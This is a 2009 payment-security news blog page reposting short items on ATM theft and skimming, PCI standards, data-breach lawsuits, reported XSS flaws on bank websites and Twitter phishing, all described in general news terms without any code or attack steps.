Friday, May 22, 2009

How To Hack an ATM Part V

Thieves use tractor to try to steal ATM from Gilbert bank

Related videos:
GILBERT, AZ -- Police are investigating an attempted ATM robbery in Gilbert.  It happened just before 5 a.m. Thursday at an M&I Bank near Higley and Queen Creek roads. Police said the would-be robbers tried to make off with the entire machine. Video from the scene shows that they didn't get past the parking lot.

Police said the suspects used a stolen John Deere tractor to bust the ATM loose.

By the times officers arrived on the scene, the thieves were gone. The ATM, however, was on the ground and all of the money was still inside.It's early in the investigation, but at this point police have few leads in the case. They believe the tractor was stolen from Chandler Heights and Higley. Anybody with information about the incident is asked to call the Gilbert Police Department.

PCI SSC Announces New Board of Advisors


May 21, 2009 by ADMIN · 1 Comment
From the PCI Security Standard Council  via Anthony Freed Feed at Information-Security

The PCI Security Standards Council (PCISSC), an independent industry standards body providing management ofthe Payment Card Industry Data Security Standard (DSS) on a globalbasis, today announced the results of elections for the PCI SSC Boardof Advisors.
The Board of Avisors will representthe current global roster of over 500 PCI SSC ParticipatingOrganizations and provide critical feedback to the ongoing enhancementof security standards managed by the Council.

More than 140 organizations from acrossthe payment industry were nominated for their direct experience andleadership in the field, reflecting the varied perspectives ofdifferent global stakeholders. To ensure the desired breadth ofindustry focus, the elected seats were distributed within thecategories of: Financial Institutions; Merchants; Processors; Vendors,and Others (Industry Associations, etc).

Of those nominated, 14 organizationswere elected by their peers in the PCI SSC Participating Organizationsmember base to serve on the board and provide strategic and technicalguidance to the PCI Security Standards Council. To ensure geographicand functional diversity, an additional seven seats were appointed fromthe Participating Organization roster by the PCI SSC Executive Councilto fill any gaps in representation and to help augment anyunder-represented stakeholder sector or geographic market. As aworldwide organization managing a portfolio of industry standards, theCouncil seeks input from EMEA, North America, Latin America and AsiaPacific to reflect the global nature of card data security threats.

The new Board of Advisors is comprised of representatives from the following organizations:
  • Bank of America
  • Banrisul S.A.
  • Barclaycard
  • Chase Paymentech Solutions Inc
  • Cisco
  • Citrix Systems, Inc.
  • European Payments Council
  • Exxon Mobil Corporation
  • First Data
  • Global Payments Inc.
  • JPMorgan Chase & Co
  • Lufthansa Systems Passenger Services
  • McDonald’s Corporation
  • MICROS Systems, Inc.
  • National Australia Bank
  • PayPal
  • Royal Bank of Scotland Group
  • Tesco Stores Ltd
  • TSYS Acquiring Solutions
  • VeriFone
  • Wal-Mart Stores, Inc
The inaugural Board of Advisors, whichserved a two year term from 2007 to 2009, played an integral part insetting strategic direction for the Council during its formative years.Some of the areas the Board helped guide over this term include theevolution of the PCI Data Security Standard from version 1.1 to 1.2,publication of the Prioritized Approach to PCI DSS and the formation ofspecial interest groups on wireless, scoping, virtualization andpre-authorization. Board representatives will continue to play aleadership role in these groups, working with other industrystakeholders to examine the impact of different technologies andindustry specific challenges on the implementation of PCI SecurityStandards.

“Our Participating Organizations cameout in force in the recent Council nominations and election process. Itis exciting to see such widespread participation,” said Bob Russo,general manager, PCI Security Standards Council. “I would like tocongratulate not only our new Board of Advisors but everyone whocontinues to join the Council in pursuing its mission of securingpayment card data, through these collaborative processes. I’m confidentour new Board of Advisors will build upon the success of theirpredecessors in helping the Council to effectively evolve the PCIstandards and bring new tools and resources to market to help improveeducation and implementation of PCI standards.”

The first order of business for the newBoard of Advisors will be reviewing the results of a Councilcommissioned emerging technology study and preparing for the 2009 PCISecurity Standards Council Community Meetings in Las Vegas (22-24September) and Prague, Czech Republic (27-28 October).
For more information about the PCISecurity Standards Council or to become a Participating Organizationplease visit, or contact the PCI SecurityStandards Council at

About the PCI Security Standards Council:

The mission of the PCISecurity Standards Council is to enhance payment account security byfostering broad adoption of the PCI Data Security Standard and otherstandards that increase payment data security.
The PCI Security StandardsCouncil was formed by the major payment card brands American Express,Discover Financial Services, JCB, MasterCard Worldwide and Visa Inc. toprovide a transparent forum in which all stakeholders can provide inputinto the ongoing development, enhancement and dissemination of the PCIData Security Standard (DSS), PIN Entry Device (PED) SecurityRequirements and the Payment Applications Data Security Standard(PA-DSS). Merchants, banks, processors and point of sale vendors areencouraged to join as Participating Organizations.

Reblog this post [with Zemanta]

Hackers Hold Banks "Strictly and Indirectly" Liable

Source: Korea Times
Complete item:

Though it did not catch the attention of many people, something very interesting is happening in the world of Korean Internet transactions. In April 2006 when the Electronic Financial Transaction Act (EFTA) was promulgated, it was at the
center of controversy as banks were burdened with the precautions against the wrongdoings of hackers.

Since the contents of the EFTA are focused mostly on who will be held liable (Article 9) if there are any problems while engaged in electronic financial transactions, legislators of the EFTA worked with the presumption that there will be hacker attacks and concentrated mostly on how to protect consumers.

Although supporters of the EFTA argue that financial Internet service providers are in a better position than general participants of the electronic financial transaction, it remains questionable and leaves much room to be rectified at least in the eyes of U.S.-trained lawyers like me. In the traditional jurisprudence of law and equity, is it fair and just to hold the
financial Internet service providers (FISPs, mostly banks) strictly liable even without faults to be indirectly liable for any attacks from hackers?

Now since there is a move to amend the EFTA, though it is still not certain yet as to whether the banks will become less burdened after the amendment, I believe it is the right timing to revisit the EFTA almost three years after its debut.

The key issue about the EFTA is that the FISPs, mostly banks, in Korea under the act are ``strictly liable'' by ``vicarious rule'' in Internet  transactions. Of course there are some exceptions in the law for a few minor cases when the banks will be off the hook by proving the contributory negligence by its clients, for example when there is malice or gross negligence by the clients. The whole controversy can be boiled down to two questions:
1. Is t fair and right to hold the FISPs strictly liable for all the wrongdoings of
electronic financial transactions?
2. Will the strict vicarious liability for the FISPs by the EFTA detect and prevent all the wrongdoings of electronic financial transactions?

Continue Reading at Korea Times

Reblog this post [with Zemanta]

Heartland Breach Ramifications Thousands Don't Subscribe To

An interesting ramification to the Heartland Breach...because banks have "canceled" untold thousands of credit and debit cards, and reissued new ones, companies are seeing losses "in the millions of dollars" from automatic billing revenue that, is, well...not so automatic anymore. 

Automatic Billing which results in monthly subscription revenue has been, and is, being severely impacted.  The Heartland Breach has caused that bird in the hand to fly the coop...and it's safe to say some will litigiously blame the "non"payment processor.  Here's a great story from the Washington Post Blog "Security Fix:"

Security Fix - Heartland Breach Blamed for Failed Membership Renewals

Heartland Breach Blamed for Failed Membership Renewals - Brian Krebs | Security Fix

In February, Bill Oesterle began seeing nearly twice the normal number of transactions being declined for customers who had set up auto-billing on their accounts. The co-founder of Angie's List -- a service that aggregates consumer reviews of local contractors and physicians -- said he originally assumed more customers were simply having trouble making ends meet in a down economy.

But as that trend continued into March and April, the company shifted its suspicions to another probable culprit: credit card processing giant Heartland Payment Systems.

The data breach last year at Heartland -- a company that processes roughly 100 million card transactions a month for more than 175,000 businesses, has forced at least 600 banks to re-issue untold thousands of new cards in a bid to stave off fraud.

For consumers, receiving a new credit or debit card number means contacting companies that have those credentials on file to charge for monthly or periodic bill payments. Less well understood, however, is the economic impact that large scale processor breaches and the inevitable waves of re-issues by banks may have on companies when customers simply fail to reset that automatic billing when they receive a new card number.

The Heartland breach happened late in 2008 and was quietly announced in late January. Since then, Oesterle said, Angie's List has seen an increase of two to four percentage points in the rejection of auto-billed payments.

"We estimate that we're seeing an impact of perhaps as much as $1 million in revenue as a result of the increased turnover in card turnover," Oesterle said.

Oesterle said the possibility of the Heartland breach as the source of the increased turnover became clear at a recent staff meeting, when he discovered that three out of four of the people around the table had recently been re-issued new credit cards by their banks, which had attributed the action to the Heartland breach.

"So we started doing some random sampling, and took a look at people [whose cards were] being declined, and started contacting them," Oesterle said. "Most of the people we contacted said they were happy with the service, but had had their credit card re-issued by their bank as a result of the Heartland breach."

The trouble is that convincing customers who had once set up auto-billing to reestablish that relationship after such a disruption is tricky, as many people simply don't respond well to companies phoning or e-mailing them asking for credit card information, Oesterle said.

"We have processes in place to track these rejections that allow us to go back to members, asking for updated information, but we generally accept that some rejected auto-bills will never be recouped," he said. "We'll work hard to re-capture those members, but it will cost us additional resources to do so - and some will be lost."

Avivah Litan, a fraud analyst with Gartner Inc., said no doubt much of the attrition companies like Angie's List are seeing is in fact due to cards being re-issued by banks in response to the Heartland breach. But she said Heartland is likely also being wrongly blamed as the source of cards compromised in other -- less publicized -- data breaches that happened at the same time.

Continue Reading at Security Fix

Reblog this post [with Zemanta]

Fugheddaboudit Says MS to EU on Hearing

Microsoft won't bother with EU hearing
Microsoft wanted the European Commission to reschedule a hearing at which Redmond would be be able to defend itself against the EU's conclusion that tying IE to Windows is anticompetitive. The reason: Microsoft's top antitrust staff would be attending a big conference in Zurich. The EU declined. Microsoft's response: Just forget it.

Reblog this post [with Zemanta]

Hannaford Lawsuits Dismissed...You Didn't Lose Money Says Judge

Dismissing Hannaford Lawsuits, Federal Judge Tells Consumers: Show Me The (Lost) Money

Written by Evan Schuman and Fred J. Aun
May 13th, 2009

U.S.District Court Judge D. Brock Hornby on Tuesday (May 12) became thelatest jurist to rule in favor of data-breached retailers, tellingHannaford consumers that because they were compensated by their banks,they have no basis to sue civilly here.

“There is no way tovalue and recompense the time and effort that consumers spent inreconstituting their bill-paying arrangements or talking to bankrepresentatives to explain what charges were fraudulent. Those are theordinary frustrations and inconveniences that everyone confronts indaily life with or without fraud or negligence.

The class-action-lawsuit-wannabe stems from lastyear’s data breach at the grocery chain, which exposed 4.2 millioncredit and debit cards and led to 1,800 reported cases of fraud.Similar to rulings from cases fellow data-breach retail victim TJX,Hornby said he couldn’t allow almost any of the defendants to continuewith the case because the consumers hadn’t suffered out-of-pocketfinancial losses.

In an ironic sense, this all stems from thecard brands’ zero liability programs. Those programs guarantee thatconsumers will have all fraud losses wiped clean. (The one defendantwho can continue is a consumer whose fraud loss costs ”for reasonsunknown were not covered by her bank.)

In his decision (full text copy available),Hornby rejected all but one of the claims brought by 21 plaintiffsagainst the Maine-based operator of more than 200 stores in NewEngland, New York and Florida.

Continue Reading at

Reblog this post [with Zemanta]

X86 Virtualization Should Be Virtually 86'd - IBM

IBM security expert: X86 virtualization not ready for regulated, mission-critical apps
Created May 22 2009 - 11:32am

In a session on virtualization held at Interop Las Vegas this week, IBM security expert Joshua Corman argued that X86 virtualization in not ready for highly regulated, mission-critical applications. The problem is that virtualization opens up new attack surfaces, as well as presents additional operational and availability risks.

In addition, the presence of advanced features--such as live migration of virtual machines--also increases the complexity. Besides the possibility of man-in-the-middle attacks designed to intercept unencrypted data when virtual machines are in transit, another pertinent question to ask is whether a virtual machine moved to a less secure machine.

Indeed, virtualization makes it difficult to meet regulatory requirements such as the PCI DSS. Corman, who is the principal security strategist for IBM's Internet Security Systems division, said, "If you have a choice, I highly recommend you don't adopt virtualization for any regulated project. If you're going to make mistakes, it's better to do so on less critical systems."
Ironically, though, Corman noted how obsession with compliance results in people giving up on risk management. He does offers some advice for organizations working with virtualization. For one, only Type 1, or bare-metal hypervisors should be used for production applications. Also, production applications should be separated from those used for testing or development.

For more on this story:

- check out this article [1] at Network World

Reblog this post [with Zemanta]

RSA (EMC) Unveils New InfoSec Products to Protect PII

RSA, the security division of EMC, has announced a comprehensive suite that is expected to help organisations comply with the US Data Breach Notification Laws for protecting personally identifiable information (PII) and mitigate the risk of security breaches.

RSA is announcing three distinct packages of information security products, including two-factor authentication, security information and event management (SIEM) and data loss prevention (DLP) which are expected to be designed to meet the needs of mid-sized companies.

Reportedly, RSA SecurID prevents data breaches by enabling organizations to ensure that both business data and private customer data are available only to authorized users.

Continue Reading at CBR security

, , ,

RSA Pledges to Tackle Credit Card Fraud

RSA pledges to tackle credit card fraud
Insurance firm offers package to help businesses.  Insurance provider RSA has launched a package of materials aimed at helping retailers tackle credit card fraud.

Credit card theft and cloning have been heavily in the news of late, with rising incidences and new security technologies both recently reported.  RSA has now launched a series of tools - including workshops and self-assessment questionnaires - which retailers can use to ensure they adhere to the Payment Card Industry's Data Security Standard, which is a series of measures aimed at tackling fraud.

"Retailers currently face a great deal of challenges with fragile sales and regular and frequent changes to legislation," said Des Cross, RSA retail director.  "The threat of security attacks on their computer systems leading to the abuse of customer data is yet another growing worry for them and could prove costly to their reputation.  "We have created a package to help businesses keep all of these worries under control."  Some of the more novel approaches to tackling credit card fraud revealed lately have included a card with its own keypad and a card that can tell which country its owner is in.

US Bank and BofA Websites Vulnerable to XSS

Banking / Finance Alerts
Source: Softpedia
Complete item:

Cross-site scripting weaknesses have been discovered in two websites belonging to the Bank of America and U.S. Bank. The flaws facilitate potential phishing attacks, because they allow attackers to inject IFrames, hijack sessions, or prompt arbitrary alerts.

Cross-site scripting, more commonly known as XSS, is a class of vulnerabilities typically affecting web applications, which facilitate arbitrary code injection into pages. They are the result of poor programming, manifested by the failure to properly escape input passed into web forms.

The flaws discovered in the websites of the U.S. Bank and Bank of America are referred to as non-persistent XSS weaknesses and are the most widely spread type in the class. This means that, while they can be exploited through URL manipulation, the injected code does not persist if the URL is changed.

Even if the actual risk posed by these weaknesses is lower than that of persistent XSS flaws, they are still dangerous for various reasons. For example, such malformed URLs can be used in complex phishing campaigns, significantly raising their credibility. This is because users are, obviously, more likely to visit unsolicited links pointing to domains they trust.

The latest vulnerabilities have been reported and documented by a grey-hat hacker calling himself Methodman, who is a member of Team Elite, a group of programmers and security enthusiasts. In his proof-of-concept (PoC) attacks, he outlines how attackers can sniff session cookies (text files stored by websites inside browsers in order to automatically authenticate users).

However, even if Methodman limited his PoCs to session hijacking attacks, this is not the only unauthorized action cybercrooks can perform through these flaws. As demonstrated by the screenshots we took ourselves, IFrame injection is also possible. IFrame is an HTML element, which allows loading externally hosted content into a web page.

IFrames are heavily used in most web-based attacks, because they can be entirely hidden. Hidden IFrames are generally used by malware distributors to load malicious JavaScript code in the background. However, styles can be applied to them fairly easy, which is a great advantage for phishers. For example, such an IFrame could be used to inject a rogue form, which asks for the visitor's financial details, and be made to look as being part of the legit page.

At the time of posting this article, the XSS weaknesses on the U.S. Bank and Bank of America websites remained active.


Reblog this post [with Zemanta]

MasterCard Losing $30 Billion of Debit Portfolio to Visa

Source: Bloomberg
Complete Item:
MasterCard Inc., the world’s second- largest electronic payments network, will lose more than half of a $59 billion portfolio of U.S. debit-card users after JPMorgan Chase & Co. decided to shift more business to Visa Inc., "two people" familiar with the matter said.

MasterCard held the portfolio since 2005, said "the people", who declined to be identified because the switch hasn’t been officially announced. The customers had checking accounts at Seattle-based Washington Mutual Inc. until JPMorgan bought assets of the failed lender last year, the people said. Bidding for the accounts began in October, "the people" said.

“We recognize that given the highly competitive nature of our industry and the challenging environment facing our financial institution customers today, decisions such as these can occur,” said Joanne Trout, a spokeswoman for Purchase, New York-based MasterCard. The move won’t have a material impact on MasterCard’s revenue, Trout said. (priceless?)

The shift strengthens Visa’s hold on debit cards as consumers use them for a bigger share of their purchases, including staples such as gasoline and food. Visa already controls about two-thirds of the U.S. debit market, according to the Nilson Report, an industry newsletter. Issuers are counting on more debit card use to make up for declining credit-card profit as the 8.9 percent U.S. jobless rate drives up defaults.

Continue Reading

, , , , , , , , , ,

Twitter Cloned at Tvviter: Be Aware!

Security experts warn on malicious tweets
Complete Item:

Twitter users! Be warned that you could be the target of a latest phishing campaign that tries to persuade all you micro-bloggers into revealing your login details. Security researchers at Sophos warn that messages are being circulated that point Twitter users towards a website called (with two 'v's rather than a 'w'). (I wouldn't recommend you visit)  People who make the mistake of clicking on the link will be taken to a bogus (cloned) website which is pretending to be Twitter.

It hopes to fool people into handing over their username and password,” Sophos said on one of its official blogs, which it reckons could lead ultimately to some painful identity fraud, as well as an account being used for the purposes of spam or spreading malware.

Editor's Note: There's those ever present "username and passwords" causing problems again. And yet another cloned website. When Twitter's gets serious about TwitPay I hope these whispers are heard as shouts and they use a secure 2FA (not username and password).

Reblog this post [with Zemanta]

4 in L.A. Charged in $400k Citibank ATM Skim Scam

4 Charged in San Fernando Valley "Skim" Scam after milking $400k from a Citibank ATM
Source: KTLA News
Complete Item:,0,6322452.story

LOS ANGELES - Four San Fernando Valley men are charged in an alleged electronic crime scheme in which more than two dozen victims lost more than $400,000 via phony ATM withdrawals.  Oganes Tangabakyan, 31, and Edgar Yerkanyan, 25, both of Sherman Oaks, Aznaour Poghosyan, 26, of Tujunga; and Vahe Hovsepyan, 33, of Reseda, are scheduled to be arraigned May 28 at the downtown Los Angeles courthouse on the 57-count complaint.

The investigators also seized several late-model, high-end automobiles
and more than $200,000 in cash -- most of it in $20 bills, officials said. 

The District Attorney's Bureau of Investigation began investigating the
case last August after being informed by Citibank of possible ATM fraud,
according to the District Attorney's Office.

The defendants allegedly gained access to ATM personal identification
numbers through skimming devices placed on debit card point of service
terminals and ATMs in Southern California and at least one other state.

Bail was set at $1 million each for the four men, who were arrested

, ,

ATM Skimming Epidemic Hits Australia

In an article written for Australian PC Authority, Daniel Long talks about the recent rash of card skimming incidents over there. 
Credit card fraud costs Australia $120m, but there are ways to protect yourself

Card skimming and online fraudsters are costing Australians over $120m a year, but there is hope say experts. We've got some tips on how to navigate your local ATM and what to look out for.

According to a new white paper by information security specialist Steve Darrall of CQR Consulting, Australia is experiencing something of a credit card fraud epidemic.
In recent months, ATM machines have been blown sky high, card skimming machines have grown increasingly more prevalent in our suburbs and credit card fraud, online and offline is at an all-time high.
The white paper claims that card skimming alone now costs Australians more than $49m a year, and that's just in 2008. In all, total credit fraud made up around $120m from two main groups:

- Counterfeit cards and card skimming ($49m)
- Card not present fraud (CNP) concerns your mail, telephone, fax and internet transactions. ($71m) 

Two banking security initiatives have been offered by CQR as a better way of protecting against credit card frauds and they hope that the wider adoption of these measures can help the banks/card companies better protect consumers:

1. Payment Card Industry Data Security Standard (PCI-DSS):
Developed by the major credit card brands, this standard applies to all organizations that store, process or transmit cardholder payment data, regardless of size or transaction numbers.

2. Payment Application Data Security Standard (PA-DSS).
This standard applies to software applications designed to store, process or transmit payment card information.

Mr Darrall believes that what's holding back the mass adoption of these standards are costs and mindset of the merchants. Darrall told PC Authority that while the banks are very interested in adopting these standards, merchants have not been so crash hot about the idea. Furthermore, this isn't an area for complacency. Even with the introduction of more advanced chip and PIN cards, "this isn't the magic bullet" we might be hoping for, but a step in the right direction says Mr Darrall.

The card skimming problem

Even with the growth of online fraud and banking phishing schemes, physical card skimming is a growing problem. Physical card skimming uses electronic equipment to steal your PIN at the ATM. And it can be much harder for customers to detect.

skimming is getting so high tech that some gangs are resorting to using
Bluetooth and fake keyboards to 'catch' your PIN when you enter it, so
holding your hand over the keyboard will make little difference in this

But according to Mr Darrall, there are techniques you can use to minimize your risk.  (Continue Reading)

, , , , , , , , , ,

Disqus for ePayment News